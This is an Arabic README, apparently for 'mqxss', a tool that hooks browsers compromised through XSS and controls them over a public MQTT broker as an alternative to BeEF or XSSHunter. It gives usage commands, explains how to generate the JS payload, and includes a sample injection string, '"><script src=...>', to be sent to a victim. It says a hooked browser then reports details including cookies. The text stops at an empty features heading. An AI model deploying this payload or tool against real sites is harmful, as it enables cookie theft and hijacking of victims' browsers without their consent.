
اتصال المتصفح المُخترق عبر MQTT

الفائدة من استخدام هذا بدلاً من beef أو xsshunter هي أنه بالإضافة إلى استضافة حمولة js، لا يوجد أي إعداد للبنية التحتية، يمكنك استخدام وسيط عام (لكنه يستخدم حالياً التعتيم، التشفير قيد التطوير).
ستتواصل المتصفحات المُربوطة عبر موضوع MQTT على الوسيط الذي تحدده، وهناك العديد من الوسائط العامة/المجانية لاختبار ذلك.
يستخدم العميل مكتبة paho.mqtt الخاصة ببايثون بينما تستخدم حمولة js ملف 'mqttws31.min.js' الذي يتم جلبه من هنا 'https://cdnjs.cloudflare.com/ajax/libs/paho-mqtt/1.0.1/mqttws31.min.js'.

لتوليد حمولة JS لربط المتصفحات بها، قم بتعيين العلم -g وقت التشغيل مع متغيرات الوسيط والمنفذ والموضوع. سيؤدي ذلك إلى إنشاء الحمولة في مجلد /js/.
لتشغيل العميل قم بتوفير الوسيط والمنفذ والموضوع كما يلي
mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname
لتشغيل العميل ببيانات الاعتماد قم بتوفير الوسيط والمنفذ واسم المستخدم وكلمة المرور والموضوع كما يلي
mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname -u username -pw password
أرسل حمولة XSS الخاصة بك إلى الضحية أثناء تشغيل عميل mqxss، مثال: '"><script src=https://example.com/x.js async></script> أو شيء مشابه، إذا كان الهدف عرضة للثغرة، فيجب أن تحصل على إشعار بأن المتصفح قد اتصل مع بعض التفاصيل الأساسية بما في ذلك ملفات تعريف الارتباط وما إلى ذلك.

الميزات: